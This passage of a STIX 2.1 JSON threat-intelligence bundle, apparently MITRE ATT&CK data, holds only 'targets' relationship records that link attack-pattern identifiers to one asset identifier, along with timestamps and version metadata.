"2024-07-01T10:37:15.823791", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1844902b-9b99-4db5-a200-2c3659d0b147", "created": "2024-07-01T10:37:15.823799", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823801", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd568cd2-305a-4a89-9c5e-a9088518aac5", "created": "2024-07-01T10:37:15.823808", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823810", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c77964c-a56b-4e4b-9a1c-ee636157ddb9", "created": "2024-07-01T10:37:15.823818", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823820", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22eb3bd6-84f3-455f-86a6-60c558789efe", "created": "2024-07-01T10:37:15.823828", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823830", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3354174-faa7-441a-b807-5e440388cd2a", "created": "2024-07-01T10:37:15.823838", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823840", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1471c8c-b290-40f0-9209-d3eecdcdf102", "created": "2024-07-01T10:37:15.823848", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823850", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b72ffc2-23ce-4358-a788-f5e538dbe4e6", "created": "2024-07-01T10:37:15.823858", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823860", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36627783-f13f-4c74-9c38-b4d8f7c76fb4", "created": "2024-07-01T10:37:15.823869", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823871", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1375ba97-6341-4255-b7e7-fbe8707ac3e4", "created": "2024-07-01T10:37:15.823879", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823881", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72d4dc08-8a91-480f-909d-84fc159d9188", "created": "2024-07-01T10:37:15.823889", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823891", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5c007e8-20de-4c65-80fc-4ce2d3003b83", "created": "2024-07-01T10:37:15.823899", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823901", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66a8e8c6-272d-4a44-beab-e356594ce747", "created": "2024-07-01T10:37:15.823909", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823911", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd3b959a-289c-43ed-b074-7c6f52b99046", "created": "2024-07-01T10:37:15.823919", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823921", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5712a6c1-e1fd-463f-bd69-f5bc0df8e6e5", "created": "2024-07-01T10:37:15.823929", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823931", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--194efbd0-ad57-4993-864a-3a8b096ee7dc", "created": "2024-07-01T10:37:15.823939", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823941", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb7c8edc-0d90-40d0-aae8-04a55d2e39b7", "created": "2024-07-01T10:37:15.823949", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823951", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--843d81ee-00e9-4145-9780-7a17e6e2027e", "created": "2024-07-01T10:37:15.823959", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823961", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e4689424-42ed-47d7-b5f4-df4e2ee4495d", "created": "2024-07-01T10:37:15.823968", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823970", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27c032ba-ae06-4e21-928e-93cc40e88a0a", "created": "2024-07-01T10:37:15.823978", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823980", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9cb36ae6-5276-4042-93ff-de5bc047e1a4", "created": "2024-07-01T10:37:15.823988", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823991", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--04d30d1b-138c-4713-b83c-ac9d6a2d0b0f", "created": "2024-07-01T10:37:15.823999", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824001", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--baca8407-02bc-4a33-b6b5-76cfc083e0a1", "created": "2024-07-01T10:37:15.824008", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824010", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b45fe46-d8f2-403b-85aa-2c51bd6d5ec6", "created": "2024-07-01T10:37:15.824019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--18e05b53-f9b6-4297-bb76-c4527fcabdef", "created": "2024-07-01T10:37:15.824029", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824031", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e849fea-ac43-4c67-a52c-aa7e820a15bd", "created": "2024-07-01T10:37:15.824065", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824072", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--910b94ed-7d8f-4a68-b92e-25fb6809f9ac", "created": "2024-07-01T10:37:15.824092", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824094", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b891f8c3-7fe7-4c1a-913f-33b9dfaba479", "created": "2024-07-01T10:37:15.824105", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824108", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ec8ed97-9d71-46a2-aa4e-014e516605e1", "created": "2024-07-01T10:37:15.824117", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824119", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5fe5127-8ccd-4f82-9ec7-f519eee9c421", "created": "2024-07-01T10:37:15.824128", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824130", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e725628-9618-4e2d-b73f-384b149c0b4a", "created": "2024-07-01T10:37:15.824139", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824141", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba02db0c-c0e5-4eff-b6e4-558ce4e00c25", "created": "2024-07-01T10:37:15.824150", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824152", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6fc62219-60da-440f-b388-976889176377", "created": "2024-07-01T10:37:15.824160", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824162", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e1a5f5c6-b620-4589-8475-4cbb5e076455", "created": "2024-07-01T10:37:15.824171", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824173", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86592399-ad0c-4ff7-8f17-ff80137880b0", "created": "2024-07-01T10:37:15.824181", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824183", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eef6e7de-135a-4ae6-afb4-eff2529b591f", "created": "2024-07-01T10:37:15.824192", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824194", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cca89bd4-c8b5-48b0-89b5-06453cb72096", "created": "2024-07-01T10:37:15.824202", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824204", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f5ce2cd-aae0-4173-b0ec-d1a5d36927c9", "created": "2024-07-01T10:37:15.824212", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824214", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b52893aa-cce7-42a5-bf7a-15b8cef312f6", "created": "2024-07-01T10:37:15.824223", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824225", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b384c0e6-8f2a-465a-96a7-b929b9442869", "created": "2024-07-01T10:37:15.824233", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824235", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91aa5714-8600-40b3-bff2-fe5190916274", "created": "2024-07-01T10:37:15.824243", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824245", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d9aa3d6-543f-4895-8355-015db18c3779", "created": "2024-07-01T10:37:15.824254", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824256", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", 